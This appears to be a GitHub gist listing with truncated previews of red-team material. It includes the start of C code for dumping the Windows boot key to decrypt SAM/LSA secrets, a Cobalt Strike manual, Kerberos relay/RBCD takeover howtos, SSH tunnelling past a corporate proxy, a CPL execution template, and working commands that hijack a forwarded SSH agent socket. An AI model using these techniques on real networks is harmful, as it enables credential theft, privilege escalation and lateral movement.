filipesam
Dfte
/ DumpBootKey.c
Created
July 4, 2024 13:49
C code to dump and compute the boot key used to decrypt SAM and LSA secrets.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <windows.h> | |
| #include <stdio.h> | |
| #define BOOT_KEY_SIZE 16 | |
| #pragma warning(disable: 4996) | |
| void getRegistryClassValue(HKEY rootKey, const char* subKey, char* classValue, DWORD classValueSize) { | |
| HKEY hKey; | |
| LONG result = RegOpenKeyExA(rootKey, subKey, 0, KEY_READ, &hKey); | |
| if (result != ERROR_SUCCESS) { | |
| fprintf(stderr, "Error opening registry key: %ld\n", result); |
wsummerhill
/ Shannon-Entropy.py
Last active
November 20, 2024 17:07
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys, os | |
| import argparse | |
| import math | |
| import pefile | |
| ''' | |
| Shannon-Entropy.py | |
| Determine Shannon Entropy of any file - value output between 0 (ordered) and 8 (fully random) | |
| Optinally add `-pe` argument to parse file headers of PE file and determine entropy for each header | |
| ''' |
filipesam
/ Red-Teaming-tool.md
Created
March 27, 2023 16:46
— forked from z0rs/Red-Teaming-tool.md
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| MANUAL COBALT STRIKE | |
| !------------------------------------------------- --Standard Commands---------------------------------------------- -----! | |
| Creating a load | |
| Attacks->Packages-> | |
| interact - choose an agent | |
| help -> will show a list of commands | |
| help [command] will show help for a specific command | |
tothi
/ krbrelay_privesc_howto.md
Last active
April 23, 2025 01:59
Privilege Escalation using KrbRelay and RBCD
Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.
No-Fix Local Privilege Escalation from low-priviliged domain user to local system on domain-joined computers.
Prerequisites:
- LDAP signing not required on Domain Controller (default!)
MohamedTarekq
/ allraft-dicc-boom.txt
Created
April 16, 2022 07:33
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| A-001.htm | |
| A-002.htm | |
| A-003.htm | |
| A-004.htm | |
| A-005.htm | |
| A-006.htm | |
| A-007.htm | |
| A01 | |
| A02 | |
| A03 |
filipesam
/ gist:ac0dc1bc69be959d9489b67264a449e7
Created
January 16, 2022 17:48
— forked from chtz/gist:b3f3e0e764a75ee4f41e0e7da922c39d
SSH over HTTP tunnel (hts- & htc Sample)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| # Client (Cygwin) | |
| lynx -source rawgit.com/transcode-open/apt-cyg/master/apt-cyg > apt-cyg | |
| install apt-cyg /bin | |
| apt-cyg install httptunnel | |
| htc -P $CORP_HTTP_PROXY_HOST:$CORP_HTTP_PROXY_PORT -F 8888 $HTS_SERVER_HOST:80 | |
| ssh -p 8888 $USER@localhost |
gladiatx0r
/ Workstation-Takeover.md
Last active
August 25, 2025 14:06
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure
In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;
- Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
- Relaying that machine authentication to LDAPS for configuring RBCD
- RBCD takeover
The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.
reigningshells
/ Cplapplet.cpp
Created
March 7, 2021 03:36
DllMain template to execute code in a .cpl file which is just a renamed DLL that exports a function CplApplet
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| // dllmain.cpp : Defines the entry point for the DLL application. | |
| #include "pch.h" | |
| #include <Windows.h> | |
| extern "C" __declspec(dllexport) LONG CplApplet() | |
| { | |
| MessageBoxA(NULL, "Replace this message box with something more interesting...", "Control Panel", 0); | |
| return 1; | |
| } |
int0x80
/ SSH Agent Forwarding.md
Created
January 7, 2021 00:59
Here's one of my favorite techniques for lateral movement: SSH agent forwarding. Use a UNIX-domain socket to advance your presence on the network. No need for passwords or keys.
root@bastion:~# find /tmp/ssh-* -type s
/tmp/ssh-srQ6Q5UpOL/agent.1460
root@bastion:~# SSH_AUTH_SOCK=/tmp/ssh-srQ6Q5UpOL/agent.1460 ssh user@internal.company.tld
user@internal:~$ hostname -f
internal.company.tldNewerOlder